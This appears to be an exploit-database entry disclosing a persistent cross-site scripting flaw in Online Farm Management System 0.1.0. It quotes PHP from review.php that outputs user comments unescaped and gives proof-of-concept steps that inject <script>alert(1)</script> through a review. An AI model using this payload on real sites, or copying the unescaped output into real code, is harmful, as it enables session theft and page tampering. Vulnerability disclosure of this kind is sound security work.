8bb6bd8fb0
8 changes to exploits/shellcodes SuperMicro IPMI WebInterface 03.40 - Cross-Site Request Forgery (Add Admin) Zyxel Armor X1 WAP6806 - Directory Traversal Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection Online Polling System 1.0 - Authentication Bypass Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
26 lines
No EOL
797 B
Text
26 lines
No EOL
797 B
Text
# Exploit Title: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
|
|
# Date: 2020-06-29
|
|
# Exploit Author: KeopssGroup0day,Inc
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/14198/online-farm-management-system-phpmysql.html
|
|
# Software Link: https://www.campcodes.com/projects/php/249/farm-management-system-in-php-mysql/
|
|
# Version: 0.1.0
|
|
# Tested on: Kali Linux
|
|
|
|
Source code(review.php):
|
|
<?php
|
|
if($result) :
|
|
while($row1 = $result->fetch_array()) :
|
|
?>
|
|
<div class="con">
|
|
<div class="row">
|
|
<div class="col-sm-4">
|
|
<em style="color: black;"><?= $row1['comment']; ?></em>
|
|
</div>
|
|
|
|
|
|
POC:
|
|
|
|
1. http://192.168.1.58/a/review.php?pid=31 go
|
|
2. We send the payload (<script>alert(1)</script>)
|
|
3. Write a review payload and submit
|
|
4. And refresh the page |